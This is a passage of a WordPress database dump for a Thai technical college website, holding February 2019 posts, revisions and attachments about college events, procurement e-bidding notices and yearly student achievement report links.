(5171, 3, '2019-02-12 13:22:01', '2019-02-12 06:22:01', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D760693790973478%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'สถาบันการอาชีวศึกษาภาคตะวันออก ร่วมมือกับ สถาบันสหกิจศึกษาและพัฒนาสื่ออิเล็กทรอนิกส์ ไทย-เยอรมัน มหาวิทยาลัยเทคโนโลยีพระจอมเกล้าพระนครเหนือ จัดโครงการพัฒนาศักยภาพผู้ประกอบการด้านการออกแบบและการผลิตชิ้นส่วนยางยนต์ ชิ้นส่วนอากาศยานด้วยเทคโนโลยีขั้นสูงในเขตพัฒนาพิเศษภาคตะวันออก ระหว่างวันที่ ๑๒-๑๕ กุมภาพันธ์ ๒๕๖๒ ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '5169-revision-v1', '', '', '2019-02-12 13:22:01', '2019-02-12 06:22:01', '', 5169, 'http://www.technicrayong.ac.th/5169-revision-v1/', 0, 'revision', '', 0),
(5172, 3, '2019-02-13 16:12:30', '2019-02-13 09:12:30', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.761368564239334%26type%3D3&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๑๓ กุมภาพันธ์ ๒๕๖๒ คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู รับมอบโครงการปรับปรุงอาคารสถานที่ปฏิบัติงานด้านความปลอดภัยฯ จากบริษัท สตาร์ ปิโตเลี่ยม รีไฟน์นิ่ง จำกัด (มหาชน) SPRC ซึ่งดำเนินการปรับปรุงด้านไฟฟ้า ทาสีพื้นอาคารเรียนเพื่อแบ่งแยกโซนการทำงาน ติดตั้งสัญลักษณ์เครื่องหมายที่เกี่ยวข้องกับความปลอดภัย และจัดการเรียนการสอนหลักสูตรความรู้ด้านความปลอดภัย ให้ผู้เรียนตระหนักถึงอันตรายจากการใช้เครื่องจักรต่างๆ ณ อาคารแผนกช่างกลโรงงาน วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%b8%e0%b8%98%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91%e0%b9%93-%e0%b8%81%e0%b8%b8%e0%b8%a1%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c', '', '', '2019-02-13 16:12:30', '2019-02-13 09:12:30', '', 0, 'http://www.technicrayong.ac.th/?p=5172', 137, 'post', '', 0),
(5173, 3, '2019-02-13 16:11:32', '2019-02-13 09:11:32', '', '51777753_761364324239758_2985539403625005056_o', '', 'inherit', 'closed', 'closed', '', '51777753_761364324239758_2985539403625005056_o', '', '', '2019-02-13 16:11:32', '2019-02-13 09:11:32', '', 5172, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/51777753_761364324239758_2985539403625005056_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5174, 3, '2019-02-13 16:12:30', '2019-02-13 09:12:30', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.761368564239334%26type%3D3&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๑๓ กุมภาพันธ์ ๒๕๖๒ คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู รับมอบโครงการปรับปรุงอาคารสถานที่ปฏิบัติงานด้านความปลอดภัยฯ จากบริษัท สตาร์ ปิโตเลี่ยม รีไฟน์นิ่ง จำกัด (มหาชน) SPRC ซึ่งดำเนินการปรับปรุงด้านไฟฟ้า ทาสีพื้นอาคารเรียนเพื่อแบ่งแยกโซนการทำงาน ติดตั้งสัญลักษณ์เครื่องหมายที่เกี่ยวข้องกับความปลอดภัย และจัดการเรียนการสอนหลักสูตรความรู้ด้านความปลอดภัย ให้ผู้เรียนตระหนักถึงอันตรายจากการใช้เครื่องจักรต่างๆ ณ อาคารแผนกช่างกลโรงงาน วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '5172-revision-v1', '', '', '2019-02-13 16:12:30', '2019-02-13 09:12:30', '', 5172, 'http://www.technicrayong.ac.th/5172-revision-v1/', 0, 'revision', '', 0),
(5176, 3, '2019-02-15 10:05:05', '2019-02-15 03:05:05', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F02%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%AD%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-%E0%B9%91-%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาจ้างก่อสร้างอาคารเรียนและปฏิบัติการพื้นที่ไม่ต่ำกว่า ๑,๙๒๐ ตารางเมตร จำนวน ๑ หลัง โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2-9', '', '', '2019-02-15 10:05:05', '2019-02-15 03:05:05', '', 0, 'http://www.technicrayong.ac.th/?p=5176', 136, 'post', '', 0),
(5177, 3, '2019-02-15 10:04:35', '2019-02-15 03:04:35', '', 'ประกาศ รายชื่อผู้ชนะราคาจ้างก่อสร้างอาคารเรียน จำนวน ๑ หลัง', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%a3%e0%b8%b2%e0%b8%84', '', '', '2019-02-15 10:04:35', '2019-02-15 03:04:35', '', 5176, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/ประกาศ-รายชื่อผู้ชนะราคาจ้างก่อสร้างอาคารเรียน-จำนวน-๑-หลัง.pdf', 0, 'attachment', 'application/pdf', 0),
(5178, 3, '2019-02-15 10:05:05', '2019-02-15 03:05:05', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F02%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%AD%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-%E0%B9%91-%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาจ้างก่อสร้างอาคารเรียนและปฏิบัติการพื้นที่ไม่ต่ำกว่า ๑,๙๒๐ ตารางเมตร จำนวน ๑ หลัง โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '5176-revision-v1', '', '', '2019-02-15 10:05:05', '2019-02-15 03:05:05', '', 5176, 'http://www.technicrayong.ac.th/5176-revision-v1/', 0, 'revision', '', 0),
(5179, 3, '2019-02-15 10:10:02', '2019-02-15 03:10:02', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.761998220843035&type=3\"><img class=\"aligncenter size-full wp-image-5180\" src=\"/wp-content/uploads/2019/02/15-2-2562-10-07-38.png\" alt=\"\" width=\"513\" height=\"780\" /></a>', 'วันพฤหัสบดีที่ ๑๔ กุมภาพันธ์ ๒๕๖๒ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา เข้าร่วมพิธีไหว้องค์พระวิษณุกรรม และมอบเกียรติบัตรให้แก่นักเรียน นักศึกษา ที่ได้รับรางวัลสุดยอดนวัตกรรมอาชีวศึกษา การประกวดสิ่งประดิษฐ์ของคนรุ่นใหม่ และการแข่งขันหุ่นยนต์อาชีวศึกษา ระดับชาติ ประจำปีการศึกษา ๒๕๖๑', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%ab%e0%b8%b1%e0%b8%aa%e0%b8%9a%e0%b8%94%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91%e0%b9%94-%e0%b8%81%e0%b8%b8%e0%b8%a1%e0%b8%a0%e0%b8%b2%e0%b8%9e', '', '', '2019-02-15 10:10:03', '2019-02-15 03:10:03', '', 0, 'http://www.technicrayong.ac.th/?p=5179', 135, 'post', '', 0),
(5180, 3, '2019-02-15 10:08:07', '2019-02-15 03:08:07', '', '15-2-2562 10-07-38', '', 'inherit', 'closed', 'closed', '', '15-2-2562-10-07-38', '', '', '2019-02-15 10:08:07', '2019-02-15 03:08:07', '', 5179, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/15-2-2562-10-07-38.png', 0, 'attachment', 'image/png', 0),
(5181, 3, '2019-02-15 10:09:32', '2019-02-15 03:09:32', '', '52489216_761964967513027_4241378705579966464_o', '', 'inherit', 'closed', 'closed', '', '52489216_761964967513027_4241378705579966464_o', '', '', '2019-02-15 10:09:32', '2019-02-15 03:09:32', '', 5179, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/52489216_761964967513027_4241378705579966464_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5182, 3, '2019-02-15 10:10:03', '2019-02-15 03:10:03', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.761998220843035&type=3\"><img class=\"aligncenter size-full wp-image-5180\" src=\"/wp-content/uploads/2019/02/15-2-2562-10-07-38.png\" alt=\"\" width=\"513\" height=\"780\" /></a>', 'วันพฤหัสบดีที่ ๑๔ กุมภาพันธ์ ๒๕๖๒ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา เข้าร่วมพิธีไหว้องค์พระวิษณุกรรม และมอบเกียรติบัตรให้แก่นักเรียน นักศึกษา ที่ได้รับรางวัลสุดยอดนวัตกรรมอาชีวศึกษา การประกวดสิ่งประดิษฐ์ของคนรุ่นใหม่ และการแข่งขันหุ่นยนต์อาชีวศึกษา ระดับชาติ ประจำปีการศึกษา ๒๕๖๑', '', 'inherit', 'closed', 'closed', '', '5179-revision-v1', '', '', '2019-02-15 10:10:03', '2019-02-15 03:10:03', '', 5179, 'http://www.technicrayong.ac.th/5179-revision-v1/', 0, 'revision', '', 0),
(5183, 3, '2019-02-18 13:36:38', '2019-02-18 06:36:38', '<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2019/02/รายงานผลสัมฤทธิ์ทางการเรียน-ปีการศึกษา-2560.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2560</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2019/02/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียนระดับ-ปีการศึกษา-2559.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2559</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2558.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2558</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2557.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2557</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2556.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2556</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2555.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2555</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2554.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2554</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2553.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2553</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2552.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2552</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2551.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2551</a></span></h3>\r\n<h3></h3>', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '2418-autosave-v1', '', '', '2019-02-18 13:36:38', '2019-02-18 06:36:38', '', 2418, 'http://www.technicrayong.ac.th/2418-autosave-v1/', 0, 'revision', '', 0),
(5184, 3, '2019-02-15 14:58:21', '2019-02-15 07:58:21', '', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียนระดับ ปีการศึกษา 2559', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%a4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2-10', '', '', '2019-02-15 14:58:21', '2019-02-15 07:58:21', '', 2418, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียนระดับ-ปีการศึกษา-2559.pdf', 0, 'attachment', 'application/pdf', 0),
(5185, 3, '2019-02-15 15:02:50', '2019-02-15 08:02:50', '<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2560</span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2019/02/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียนระดับ-ปีการศึกษา-2559.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2559</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2558.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2558</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2557.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2557</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2556.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2556</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2555.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2555</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2554.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2554</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2553.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2553</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2552.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2552</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2551.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2551</a></span></h3>\r\n<h3></h3>', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '2418-revision-v1', '', '', '2019-02-15 15:02:50', '2019-02-15 08:02:50', '', 2418, 'http://www.technicrayong.ac.th/2418-revision-v1/', 0, 'revision', '', 0),
(5186, 3, '2019-02-15 16:13:48', '2019-02-15 09:13:48', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F02%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%97%E0%B8%94%E0%B8%A5%E0%B8%AD%E0%B8%87%E0%B8%A7%E0%B8%87%E0%B8%88%E0%B8%A3%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-%E0%B9%91-%E0%B8%8A%E0%B8%B8%E0%B8%94.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์ชุดทดลองวงจรอิเล็กทรอนิกส์แบบเมนบอร์ดชนิดมีอนาล็อกโวลด์/แอมป์มิเตอร์จริงในตัว จำนวน ๑ ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%84-8', '', '', '2019-02-15 16:13:48', '2019-02-15 09:13:48', '', 0, 'http://www.technicrayong.ac.th/?p=5186', 134, 'post', '', 0),
(5187, 3, '2019-02-15 16:12:21', '2019-02-15 09:12:21', '', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์ชุดทดลองวงจรอิเล็กทรอนิกส์ จำนวน ๑ ชุด', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%84-9', '', '', '2019-02-15 16:12:21', '2019-02-15 09:12:21', '', 5186, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/ประกาศ-ประกวดราคาซื้อครุภัณฑ์ชุดทดลองวงจรอิเล็กทรอนิกส์-จำนวน-๑-ชุด.pdf', 0, 'attachment', 'application/pdf', 0),
(5189, 3, '2019-02-15 16:13:48', '2019-02-15 09:13:48', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F02%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%97%E0%B8%94%E0%B8%A5%E0%B8%AD%E0%B8%87%E0%B8%A7%E0%B8%87%E0%B8%88%E0%B8%A3%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-%E0%B9%91-%E0%B8%8A%E0%B8%B8%E0%B8%94.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์ชุดทดลองวงจรอิเล็กทรอนิกส์แบบเมนบอร์ดชนิดมีอนาล็อกโวลด์/แอมป์มิเตอร์จริงในตัว จำนวน ๑ ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '5186-revision-v1', '', '', '2019-02-15 16:13:48', '2019-02-15 09:13:48', '', 5186, 'http://www.technicrayong.ac.th/5186-revision-v1/', 0, 'revision', '', 0),
(5192, 3, '2019-02-18 13:35:34', '2019-02-18 06:35:34', '', 'รายงานผลสัมฤทธิ์ทางการเรียน ปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%a4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2-11', '', '', '2019-02-18 13:35:34', '2019-02-18 06:35:34', '', 2418, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/รายงานผลสัมฤทธิ์ทางการเรียน-ปีการศึกษา-2560.pdf', 0, 'attachment', 'application/pdf', 0),
(5193, 3, '2019-02-18 13:36:09', '2019-02-18 06:36:09', '<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2019/02/รายงานผลสัมฤทธิ์ทางการเรียน-ปีการศึกษา-2560.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2560</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2019/02/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียนระดับ-ปีการศึกษา-2559.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2559</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2558.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2558</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2557.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2557</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2556.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2556</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2555.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2555</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" 